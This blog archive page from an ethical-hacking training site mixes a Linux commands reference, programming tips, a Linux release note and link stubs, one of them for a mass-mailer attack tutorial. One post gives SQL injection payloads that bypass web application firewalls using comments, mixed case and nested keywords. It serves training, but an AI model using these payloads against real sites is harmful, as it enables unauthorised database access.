ExtremeHacking
Today : | Time : | safemode : ON
> / Main Website / Cyber Surakha Abhiyan / Hackers Charity / Linkedin / facebook / twitter /
Name Author Perms Com Modified Label
Showing posts with label Basic Tutorials. Show all posts
Showing posts with label Basic Tutorials. Show all posts

How To Find Out If Someone Is Secretly Using Your PC Unknown rwxr-xr-x 0 1/13/2017

Filename How To Find Out If Someone Is Secretly Using Your PC
Permission rw-r--r--
Author Unknown
Date and Time 1/13/2017
Label
Action
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan



  _____      _                             _   _            _    _             
 | ____|_  _| |_ _ __ ___ _ __ ___   ___  | | | | __ _  ___| | _(_)_ __   __ _ 
 |  _| \ \/ / __| '__/ _ \ '_ ` _ \ / _ \ | |_| |/ _` |/ __| |/ / | '_ \ / _` |
 | |___ >  <| |_| | |  __/ | | | | |  __/ |  _  | (_| | (__|   <| | | | | (_| |
 |_____/_/\_\\__|_|  \___|_| |_| |_|\___| |_| |_|\__,_|\___|_|\_\_|_| |_|\__, |
                                                                         |___/ 

















Click on the link given below for reading the article.


How To Find Out If Someone Is Secretly Using Your PC



Now are security updates are available on WhatsApp via Extreme Hacking Broadcast channel.



To subscribe follow the steps given on www.extremehacking.org/broadcast 

Why Does 64-Bit Windows Need Two Program Files Folders — Program Files & Program Files (x86) Unknown rwxr-xr-x 0 1/13/2017

Filename Why Does 64-Bit Windows Need Two Program Files Folders — Program Files & Program Files (x86)
Permission rw-r--r--
Author Unknown
Date and Time 1/13/2017
Label
Action
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan



  _____      _                             _   _            _    _             
 | ____|_  _| |_ _ __ ___ _ __ ___   ___  | | | | __ _  ___| | _(_)_ __   __ _ 
 |  _| \ \/ / __| '__/ _ \ '_ ` _ \ / _ \ | |_| |/ _` |/ __| |/ / | '_ \ / _` |
 | |___ >  <| |_| | |  __/ | | | | |  __/ |  _  | (_| | (__|   <| | | | | (_| |
 |_____/_/\_\\__|_|  \___|_| |_| |_|\___| |_| |_|\__,_|\___|_|\_\_|_| |_|\__, |
                                                                         |___/ 

















Click on the link given below for reading the article.


Why Does 64-Bit Windows Need Two Program Files Folders — Program Files & Program Files (x86)



Now are security updates are available on WhatsApp via Extreme Hacking Broadcast channel.



To subscribe follow the steps given on www.extremehacking.org/broadcast 

Hakku Framework – Simple Penetration Testing Framework Unknown rwxr-xr-x 0 1/13/2017

Filename Hakku Framework – Simple Penetration Testing Framework
Permission rw-r--r--
Author Unknown
Date and Time 1/13/2017
Label
Action
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan



  _____      _                             _   _            _    _             
 | ____|_  _| |_ _ __ ___ _ __ ___   ___  | | | | __ _  ___| | _(_)_ __   __ _ 
 |  _| \ \/ / __| '__/ _ \ '_ ` _ \ / _ \ | |_| |/ _` |/ __| |/ / | '_ \ / _` |
 | |___ >  <| |_| | |  __/ | | | | |  __/ |  _  | (_| | (__|   <| | | | | (_| |
 |_____/_/\_\\__|_|  \___|_| |_| |_|\___| |_| |_|\__,_|\___|_|\_\_|_| |_|\__, |
                                                                         |___/ 

















Click on the link given below for reading the article.


Hakku Framework – Simple Penetration Testing Framework


Now are security updates are available on WhatsApp via Extreme Hacking Broadcast channel.



To subscribe follow the steps given on www.extremehacking.org/broadcast 

How To perform Mass Mailer Attack using Setoolkit On Kali Linux - Unknown rwxr-xr-x 0 1/10/2017

Filename How To perform Mass Mailer Attack using Setoolkit On Kali Linux -
Permission rw-r--r--
Author Unknown
Date and Time 1/10/2017
Label
Action
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India

Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan


  _____      _                             _   _            _    _             
 | ____|_  _| |_ _ __ ___ _ __ ___   ___  | | | | __ _  ___| | _(_)_ __   __ _ 
 |  _| \ \/ / __| '__/ _ \ '_ ` _ \ / _ \ | |_| |/ _` |/ __| |/ / | '_ \ / _` |
 | |___ >  <| |_| | |  __/ | | | | |  __/ |  _  | (_| | (__|   <| | | | | (_| |
 |_____/_/\_\\__|_|  \___|_| |_| |_|\___| |_| |_|\__,_|\___|_|\_\_|_| |_|\__, |
                                                                         |___/ 



Click on the link given below for reading the article.

How To perform Mass Mailer Attack using Setoolkit On Kali Linux



Now are security updates are available on WhatsApp via Extreme Hacking Broadcast channel.

To subscribe follow the steps given on www.extremehacking.org/broadcast 

Basic Linux Commands Unknown rwxr-xr-x 0 12/15/2016

Filename Basic Linux Commands
Permission rw-r--r--
Author Unknown
Date and Time 12/15/2016
Label
Action
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India

Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan

Basic Linux Commands: 


man

Linux "manual" pages, describing in detail every command, what it's options are, and what it does.

ex

$ man
What manual page do you want?

ex2

$ man ls | more
LS(1) User Commands LS(1)

NAME

ls - list directory contents

SYNOPSIS

ls [OPTION]... [FILE]...

DESCRIPTION

List information about the FILEs (the current directory by default).
Sort entries alphabetically if none of -cftuvSUX nor --sort.

Mandatory arguments to long options are mandatory for short options

too.

-a, --all

do not ignore entries starting with .

-A, --almost-all

do not list implied . and ..

--author

--More--

pwd

Shows the path of the directory you are in; aka "Parent Working Directory".

ex

$ pwd
/home/cisc0ninja

ls (ls -al shows hidden files too)

Same as dir, list files and folders in your current directory.

ex

$ ls
agetty.exe hwclock.exe mkfs.bfs mkfs.minix sln.exe
fsck.cramfs init.exe mkfs.cramfs mkswap.exe sysctl.exe
fsck.minix killall5.exe mkfs.exe runlevel.exe telinit

clear

Same as cls, clears you current shell's screen.

cat

Same as type, "concatenates" aka list the contents of a file "normally text files".

ex

$ cat test
test

grep

"Global Regular Expressions Parser"<---(don't ask me why I know this) is used for searching files for strings you want.

ex

$ cat hackers.txt | grep Steve
Richard Stevens
Steve Bellovin
Steve Crocker
Steve Jobs
Steve Shirley
Steve Wozniak
Steven G. Steinberg

chmod

Changes the access file attributes of a file or folder.(readonly,writable,hidden,etc...)

ex (the first number is (7) is for user, second number for group, and third for everyone else, 7=writable, 5=read&execute, 0=nothing

chmod -R 700 /home/share/mydirectory

chown

Changes the ownership file attributes of a file or folder.

ex (-R means recursive ie.. for every folder and file underneath)

chown -R cisc0ninja:localadmins /home/share

rm

Removes a file.

ex

$ rm test.txt

rmdir

Removes a directory

ex

$ rmdir test

ifconfig

(ifconfig -a)
List your network interfaces and their configuration options.

ex

shinra:/home/share# ifconfig -a | more
eth1 Link encap:Ethernet HWaddr 00:17:31:37:9b:7d
inet addr:172.30.115.75 Bcast:172.30.115.255 Mask:255.255.255.0
inet6 addr: fe80::217:31ff:fe37:9b7d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:751482 errors:0 dropped:0 overruns:0 frame:0
TX packets:743923 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:496898734 (473.8 MiB) TX bytes:180162903 (171.8 MiB)
Interrupt:16

ssh

Upgraded version of telnet with an added bonus of encryption and secure copying capabilities.

ex

cisc0ninja@shinra:~$ ssh -l cisc0ninja argos.soldierx.com
Password:
§+++++++++++++++++++++++++++++++++++++++++++++++§
]|[ [-=- SOLDIERX.COM Presents -=-] ]|[

cisc0ninja@argos:~$


tar

Linux zip utility to zip and unzip files.

ex

$ tar -zxvf dnsenum1.1.tar.gz
belgacom.be_ips.txt
dnsenum.pl
dns.txt
README.txt

sort

Sorts the content inside of a document. (alpha-numerically)

ex

$ sort hackers-orig.txt | uniq >> hackers.txt

uniq

Removes duplicate entries in a file.

ex

$ sort hackers-orig.txt | uniq >> hackers.txt

mv

Moves a file.

ex

$ mv test /tmp

mount

Makes a connected device (hard drive, flash drive, etc..) accessible to you and the system whether it's mounted as readonly or writable is up to you.
It can also be used (as below) to show what devices are mounted, how, and where.

ex

shinra:/home/share# mount
/dev/md2 on / type ext3 (rw,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
procbususb on /proc/bus/usb type usbfs (rw)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/md0 on /boot type ext3 (rw)
nfsd on /proc/fs/nfsd type nfsd (rw)

df (or df -h)

shows file system usage

ex

$ df -h
Filesystem Size Used Avail Use% Mounted on
C:\cygwin\bin 75G 63G 13G 84% /usr/bin
C:\cygwin\lib 75G 63G 13G 84% /usr/lib
C:\cygwin 75G 63G 13G 84% /
c: 75G 63G 13G 84% /cygdrive/c

ps (ps -aux) or top

used for showing amount of processing power and memory each service/application is using.

ex

top - 02:35:57 up 8:07, 2 users, load average: 0.00, 0.00, 0.00
Tasks: 6 total, 2 running, 4 sleeping, 0 stopped, 0 zombie
Cpu(s): 2.7% user, 4.8% system, 0.0% nice, 92.5% idle
Mem: 1015152k total, 609300k used, 405852k free, 0k buffers
Swap: 1523712k total, 71080k used, 1452632k free, 0k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND

11392 cisc0ninja 8 0 2388 2860 40 R 2.9 0.3 0:00.09 top
1712 SYSTEM 8 0 2028 2292 76 S 0.0 0.2 0:00.15 cygrunsrv
2220 SYSTEM 8 0 2572 3692 40 S 0.0 0.4 0:00.15 sshd
3952 cisc0ninja 8 0 2860 356 12 R 0.0 0.0 0:01.12 bash
2344 cisc0ninja 8 0 2924 1884 40 S 0.0 0.2 0:01.06 bash
244 cisc0ninja 8 0 2640 132 0 S 0.0 0.0 0:00.18 ssh

vi/vim

A text editor for command line, very powerful, takes some time to getting use to.
note: (to exit out of vi/vim press esc a couple of times then the shift and colon key "same time", then type q! "not at same time";)
(if you want to save make it wq!)
ex
vi test.pl

MORE OPERATORS!!!


$

Used to define a variable or constant

ex

$ echo $SHELL
/bin/bash

--help

Gives further information on a command, such as what options are available for use with that command.

ex

$ cat --help
Usage: cat [OPTION] [FILE]...
Concatenate FILE(s), or standard input, to standard output.

-A, --show-all equivalent to -vET

-b, --number-nonblank number nonblank output lines
-e equivalent to -vE
-E, --show-ends display $ at end of each line
-n, --number number all output lines
-s, --squeeze-blank never more than one single blank line
-t equivalent to -vT
-T, --show-tabs display TAB characters as ^I
-u (ignored)
-v, --show-nonprinting use ^ and M- notation, except for LFD and TAB
--help display this help and exit
--version output version information and exit

With no FILE, or when FILE is -, read standard input.


Examples:

cat f - g Output f's contents, then standard input, then g's contents.
cat Copy standard input to standard output.

www.extremehacking.org


Cyber Suraksha Abhiyan, CEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY, MCITP, RHCE, CHECKPOINT, ASA FIREWALL, VMWARE, CLOUD, ANDROID Hacking, IPHONE Hacking, NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India


Basic WAF Bypassing within SQLi Unknown rwxr-xr-x 0 7/26/2016

Filename Basic WAF Bypassing within SQLi
Permission rw-r--r--
Author Unknown
Date and Time 7/26/2016
Label
Action
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan

Hey all,

I have recently noticed quite a few CEH candidates are having trouble with challenges that involve WAF bypassing so here's a tutorial/reference for bypassing basic WAF's























What is a WAF?

WAF stands for Web Application Firewall. A WAF is put in place by the web applications administrator in an attempt to prevent attacks such as SQLi and XSS. They detect malicious attempts with the use of signature based filters and escapes defined within a list of rules. As a result of this design, they are vulnerable to being easily bypassed by obfuscating your exploit code.

Methods of Bypass

There are many more ways of bypassing these than I can list here but this is a basic overview of three common and easy methods to try first.


1. Comments

Comments can allow you to execute code without the WAF bothering check it.

Example

Before:

Code:
http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3--

After:
Code:
http://site.com/vuln.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--

2. Capitalization of Functions

Because detections are signature based, randomly capitalizing functions can allow them to slip under the heuristic radar.

Example

Before:
Code:
http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3--

After:
Code:
http://site.com/vuln.php?id=-1 uNiOn SeLeCt 1,2,3--

3. Exploiting Escapes

Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another.

Example

Before:
Code:
http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3--

After:
Code:
http://site.com/vuln.php?id=-1 UNIunionON SEselectLECT 1,2,3--

Assuming the filter escapes the keywords "union" and "select", our code will be executed as normal.
www.extremehacking.org
Cyber Suraksha Abhiyan, CEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY, MCITP, RHCE, CHECKPOINT, ASA FIREWALL, VMWARE, CLOUD, ANDROID Hacking, IPHONE Hacking, NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India

How To Learn Programming Unknown rwxr-xr-x 0 12/29/2015

Filename How To Learn Programming
Permission rw-r--r--
Author Unknown
Date and Time 12/29/2015
Label
Action
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking

There are few students who have asked us few tips on programming. By just watch a video or listening to a programming class will not make you professional in programming. Here is a list of tips for programming/coding.


 Don’t buy books and waste money try to Google it and watch videos on YouTube.


  •      Try to use PDF or eBooks available online.
  •     Don’t copy, paste the code try to type it out.
  •     Look at the example code
  •     When you learn coding, make sure you write it down on a paper or note it in your computer
  •     Don’t read the code – run it
  •     Always have a backup of your programming files
  •     Try to understand the code
  •     Learn to use a debugger
  •     Try to write your own program once you learn it
  •     Code your program on Linux to get better experience
  •     Experiment with changes of the code
  •     Try to pick one programming language and learn it until the end
  •     Learn basic programming languages like Python, Java, Html, C 
  •     Learn the core concepts of the language
  •     Focus on one concept at a time
  •     Examine the syntax


There is no standard process of learning to code but still there are lot of guidelines, courses, ideologies and set traditions, but there is no one single correct way.

Learning to code is quite easy when one devotes sufficient amount of time and effort, you can develop very strong skills on programming short amount of time.


    Get started with C, C++ or Java because these are the standard languages used in any programming competition.
    Learn C++ if you are already good at C because it is the most popular language and it has speed and an excellent library in the form of STL (Standard Template Library).

    There are high quality website to learn coding online such as code.org and many more
    To start with coding start with simple problems that requires to transform English to code and does not require any knowledge on algorithms

    At the beginning stage of coding we no need to write long pieces of code which is actually not required. Try to keep the codes short, simple and easy.

    Keep on practicing the problems until you become famous with it
    Start using basic algorithms. You can learn them from here – Topcoder 
    Once you have the knowledge to solve popular algorithms, you can start solving the medium level problems.

    Try to participate regularly in programming contests. Solve the problems which you cannot solve in the contest.

    Read the codes of high rated programmers. Compare your solution with them. Analyse how they have improved your skills.

    Always practice the problems that you could not solve in the contest

    Do not spend too much time if your stuck somewhere. Understand the algorithm and code it. Do not look at the answer before you have tried to write the code on your own.

    Programming is a hands on skill. You have to be good at it. It’s not enough to solve the problem theoretically, you have to code it and get the solution accepted. Knowing which algorithm to use and implementing it are two different things. It takes both to be good at programming.

    Learning to code is going to take a lot of time and the key is practicing regularly. Do not give up on reading the post, try to implementing them, even if it takes many hours/days. Remember everything requires practice to master it.

The final tips is Giving up is not the key here.

www.extremehacking.org

CEH v9 CHFI v8 ECSA v9 CAST ENSA TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, Ethical Hacking Institute in Pune, Ethical Hacking Course in Pune, Ethical Hacking Training in Pune, ceh certification in pune

The Fastest Booting Linux OS Solus 1.0 Is Finally Released Unknown rwxr-xr-x 0 12/28/2015

Filename The Fastest Booting Linux OS Solus 1.0 Is Finally Released
Permission rw-r--r--
Author Unknown
Date and Time 12/28/2015
Label
Action
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking

From past few months, we have closely observed the developments made by the Solus OS team. Now, the Solus Project has finally released the first version of its operating system after the hard work spread over a period of eight months and more than 2000 package builds. Solus 1.0 is codenamed Shannon after Ireland’s longest river.


For those who don’t know, Solus 1.0 is a Linux distro built from scratch that brings along its own desktop environment named Budgie. In the past, Solus OS managed to clock some impressive boot numbers at about 1 second. Started by Ikey Doherty, Solus promises full control to the devs as both the operating system and the desktop environment are made by the same team.

Features of Solus 1.0:
Desktop Environment Budgie:

Targeting the x86_64 architecture, Solus 1.0 is built for the modern desktop with a clear design. The GTK-based desktop environment developed by the team is referred as Budgie.

The features of Budgie include a highly-efficient menu that allows you to quickly access the installed programs in compacts and category view. There’s a notification center referred to as Raven that helps you to manage the notifications and customize your experience.

Package Manager eopkg:

The Solus OS uses a package manager named eopkg that helps you to install/remove packages. With eopkg, you can search the repos for packages and manage them. An efficient package management system helps to sort packages to keep things organized.
Solus Ships With Linux kernel 4.3.3
Out-of-the-box Packages And Applications:

It includes multiple important applications out-of-the-box. They are:

    firefox 43.0.2
    nautilus 3.18.4
    rhythmbox 3.2.1
    thunderbird 38.5.0
    vlc 2.2.1

The OS supports multiple themes to make your desktop experience more personal. The OS also comes with tons of system system utilized fonts.
Solus 1.0 ISO And BitTorrent Downloads Links:

You can download the ISO images from official website and BitTorrent using this link.


www.extremehacking.org

CEH v9 CHFI v8 ECSA v9 CAST ENSA TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, Ethical Hacking Institute in Pune, Ethical Hacking Course in Pune, Ethical Hacking Training in Pune, ceh certification in pune

Free Software to Monitor Your PC’s Activity Unknown rwxr-xr-x 0 12/28/2015

Filename Free Software to Monitor Your PC’s Activity
Permission rw-r--r--
Author Unknown
Date and Time 12/28/2015
Label
Action
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking

If you ever get asked to fix the PC of a friend or colleague which has been having problems, the first thing you need to ascertain is what the friend or colleague has been doing on the PC recently. Equally, if you allow someone to use your computer, you might also monitor what they did with it.



Windows keeps all information about recent usage in it’s logs. However the issue is that these files are few and far between when spread across various log files within the system, so it can take a while to pull all the monitored information together.

This new application is called Last Activity View, which brings together the information in a single list. You can see what program was run, and when, and more information too. It’s a great tool for anyone who supports PCs or who is merely interested in monitoring what the current user is up to.

Last Activity View is a free download of less than half a megabyte. And according to VirusTotal and Web of Trust, it’s clean too. Head here for the download.

The best thing about this tool is that it is free!

www.extremehacking.org

CEH v9 CHFI v8 ECSA v9 CAST ENSA TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, Ethical Hacking Institute in Pune, Ethical Hacking Course in Pune, Ethical Hacking Training in Pune, ceh certification in pune
 

Cyber Suraksha Abhiyan | Sadik Shaikh © 2015 Sadik Shaikh | CEH V9 | ETHICAL HACKING Course Training Institute in India-Pune
Extreme Hacking Template design by Sadik Shaikh | Cyber Suraksha Abhiyan